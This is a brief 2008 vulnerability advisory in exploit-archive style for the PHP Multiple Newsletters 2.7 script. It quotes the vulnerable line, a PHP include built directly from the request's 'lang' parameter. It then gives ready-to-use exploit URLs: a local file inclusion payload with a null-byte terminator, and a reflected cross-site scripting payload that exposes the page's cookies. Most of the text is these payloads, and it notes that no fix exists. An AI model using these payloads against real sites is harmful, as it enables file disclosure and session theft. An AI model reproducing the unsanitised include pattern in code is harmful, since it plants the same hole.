PHP Multiple Newsletters 2.7 (LFI-XSS) Multiple Vulnerabilities

2008-12-09 20:30:05

****(Lfi/xss)****

script: PHP_Multiple_Newsletters v2.7

***************************************************************************
download from:http://www.phpmultiplenewsletters.com/modules/phpmultiplenewsletters.com/dist/free/PHP_Multiple_Newsletters_v2.7.zip

***************************************************************************
vul:/index.php
line 36:
include ('language/'..$_REQUEST['lang'].'.php');

***************************************************
xpl:
www.site.com/path/index.php?lang=[Lfi]%00

xss:
www.site.com/path/index.php/>"><ScRiPt>alert(document.cookie)</ScRiPt>
...................................................
Author: ahmadbady from:iran

my mail: [email protected]

***************************************************

#

Fixes

No fixes

In order to submit a new fix you need to be registered.